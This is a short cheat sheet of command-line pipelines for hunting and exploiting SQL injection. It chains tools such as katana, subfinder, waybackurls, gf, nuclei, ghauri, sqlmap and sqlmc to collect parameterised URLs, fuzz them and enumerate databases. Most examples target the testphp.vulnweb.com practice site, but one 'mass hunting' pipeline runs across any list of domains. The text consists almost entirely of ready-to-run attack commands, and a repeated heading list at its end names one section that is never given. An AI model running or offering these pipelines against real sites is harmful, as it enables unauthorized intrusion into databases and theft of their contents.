SQLis

Params find

katana -u <http://testphp.vulnweb.com> -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | sed 's/=.*/=/' | sort -u | tee testphp.vulnweb.com.output.txt

SQLi detect

sudo python3 ./lostsec.py -l testphp.vulnweb.com.output.txt -p payloads/xor.txt -t 5

Ghauri

ghauri -u "<http://testphp.vulnweb.com/artists.php?artist=*>" --dbs --batch --confirm --hostname --current-db

Sqlmap

sqlmap -u '<http://testphp.vulnweb.com/artists.php?artist=*>' --batch --dbs --threads=5 --random-agent --risk=3 --level=5 --tamper=space2comment -v 3

Mass error based sqli hunting

subfinder -dL domain.txt -recursive -all -silent | httpx -mc 200 | waybackurls | qsreplace -a "FUZZ" | grep "FUZZ" | sed 's/FUZZ//g' | gf sqli | sort -u | nuclei -t ~/pvt-template/SQLi/error-based-sqli/ -dast -o sqlis.txt

waymore, qsreplace, gf, ghauri

waymore -i "testphp.vulnweb.com" -n -mode U | qsreplace -a "FUZZ" | grep "FUZZ" | sed 's/FUZZ//g' | gf sqli | sort -u | while read urls; do ghauri -u "$urls" --dbs --threads 2 --batch --level 2 | tee -a ghauri.sqli.txt; done

waymore, qsreplace, gf, sqlmc

waymore -i "testphp.vulnweb.com" -n -mode U | qsreplace -a "FUZZ" | grep "FUZZ" | sed 's/FUZZ//g' | gf sqli | sort -u | while read urls; do sqlmc --url "$urls" -d 3 -o sqlmc.txt; done

waymore, qsreplace, gf, nuclei

waymore -i "testphp.vulnweb.com" -n -mode U | qsreplace -a "FUZZ" | grep "FUZZ" | sed 's/FUZZ//g' | gf sqli | sort -u | nuclei -t ~/nuclei-templates/dast/vulnerabilities/sqli/sqli-error-based.yaml -dast -o nuclei_sqli.txt

SQLis

Params find

SQLi detect

Ghauri

Sqlmap

Mass error based sqli hunting

waymore, qsreplace, gf, ghauri

waymore, qsreplace, gf, sqlmc

waymore, qsreplace, gf, nuclei

waybackurls, gf, sqlmap